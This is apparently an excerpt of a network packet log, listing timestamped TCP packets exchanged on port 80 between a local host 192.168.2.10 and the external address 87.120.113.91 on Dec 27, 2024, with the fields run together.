                                                        Dec 27, 2024 14:53:44.188365936 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.188404083 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.188441038 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.189096928 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.189136028 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.189209938 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.189970970 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.190009117 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.190041065 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.190829992 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.190843105 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.190864086 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.191611052 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.191641092 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.191651106 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.192358017 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.192403078 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.192456961 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.193217993 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.193254948 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.193365097 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.194006920 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.194042921 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.194169998 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.194840908 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.194884062 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.194935083 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.195646048 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.195686102 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.195805073 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.196523905 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.196564913 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.196566105 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.197328091 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.197376013 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.197424889 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.198075056 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.198115110 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.198259115 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.198967934 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.198977947 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.199016094 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.243015051 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.243083954 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.243144035 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.243208885 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.243345022 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.243381023 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.243863106 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.243964911 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.244004965 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.244697094 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.244751930 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.244795084 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.245505095 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.245688915 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.245744944 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.246644020 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.247015953 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.247061968 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.249226093 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.249404907 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.249459028 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.251060009 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.251173973 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.251226902 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.251466036 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.251594067 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.251635075 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.251993895 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.252058983 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.252104998 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.252490997 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.252543926 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.252584934 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.252986908 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.253144026 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.253187895 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.253379107 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.253447056 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.253489971 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.253737926 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.253802061 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.253839970 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.254081011 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.254122019 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.254163027 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.254471064 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.254504919 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.254548073 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.255183935 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.255295992 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.255337000 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.256027937 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.256211996 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.256257057 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.256824017 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.256942034 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.256984949 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.257678986 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.257714033 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.257755995 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.258428097 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.258538961 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.258584023 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.259360075 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.259397984 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.259445906 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.260073900 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.260205984 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.260251045 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.261013985 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.261044979 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.261086941 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.350570917 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.350594044 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.350647926 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.350871086 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.350883007 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.350931883 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.351629972 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.351686001 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.351718903 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.352720976 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.379338026 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.379386902 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.379451036 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.379533052 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.379576921 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.379652977 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.380307913 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.380346060 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.380352974 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.380983114 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.381026983 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.381098986 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.381851912 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.381895065 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.381901979 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.382714033 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.382750988 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.382760048 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.383409977 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.383449078 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.383541107 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.384268999 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.384311914 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.384367943 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.385077953 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.385119915 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.385211945 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.385953903 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.385991096 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.386035919 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.386732101 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.386775970 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.386804104 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.387532949 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.387576103 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.387605906 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.388405085 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.388451099 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.388519049 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.389149904 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.389204025 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.389276981 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.390001059 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.390044928 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.390105963 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.390825033 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.390863895 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.390980005 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.391736031 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.391781092 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.391782045 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.392438889 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.392477989 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.392534018 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.393250942 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.393296957 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.393357992 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.394097090 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.394136906 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.394188881 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.394985914 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.395020962 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.395030022 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.395740032 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.395780087 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.395909071 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.396550894 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.396591902 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.396635056 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.397357941 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.397429943 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.397449970 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.398309946 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.398344994 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.398359060 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.399065018 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.399106026 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.399117947 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.399815083 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.399854898 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.399919987 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.400657892 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.400707006 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.444291115 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.444431067 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.444500923 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.444681883 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.444715977 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.444752932 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.445394039 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.445430040 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.445470095 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.446146965 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.446194887 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.446239948 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.446954012 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.447082996 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.447133064 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.447839022 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.447995901 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.448038101 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.448616982 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.448673010 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.448723078 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.449218988 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.449367046 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.449414968 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.450110912 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.450210094 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.450264931 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.450848103 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.451006889 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.451050043 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.451674938 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.451801062 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.451848030 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.452497959 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.452651978 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.452696085 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.453613997 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.453666925 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.453712940 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.454158068 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.454241991 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.454310894 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.454974890 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.455091953 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.455141068 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.455746889 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.455862999 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.455910921 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.456630945 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.456686020 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.456726074 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.457438946 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.457562923 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.457607985 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.458246946 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.458389044 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.458426952 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.459043980 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.459167004 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.459208965 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.459908009 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.460025072 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.460066080 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.460685015 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.460982084 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.461026907 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.461590052 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.461607933 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.461641073 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.462337017 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.462347984 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.462390900 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.559536934 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.559664965 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.559748888 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.559792995 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.560026884 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.560090065 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.560137987 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.560868025 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.560902119 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.560939074 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.561604977 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.561638117 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.580728054 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.580873966 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.580924034 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.581171036 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.581248999 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.581281900 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.581887007 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.582242012 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.582264900 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.582273006 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.583035946 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.583076000 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.583148956 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.583930016 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.583971977 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.583976984 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.584741116 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.584783077 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.584821939 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.585489035 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.585530043 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.585617065 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.586365938 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.586397886 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.586497068 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.587172031 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.587204933 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.587209940 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.587973118 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.588009119 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.588015079 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.588798046 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.588829994 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.588907003 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.589728117 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.589761019 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.589792013 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.590466022 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.590507984 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.590570927 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.591245890 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.591281891 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.591348886 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.592077971 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.592109919 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.592202902 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.592947006 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.592959881 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.592987061 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.593672991 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.593707085 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.593820095 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.594583035 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.594619036 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.594635963 CET804972187.120.113.91192.168.2.10
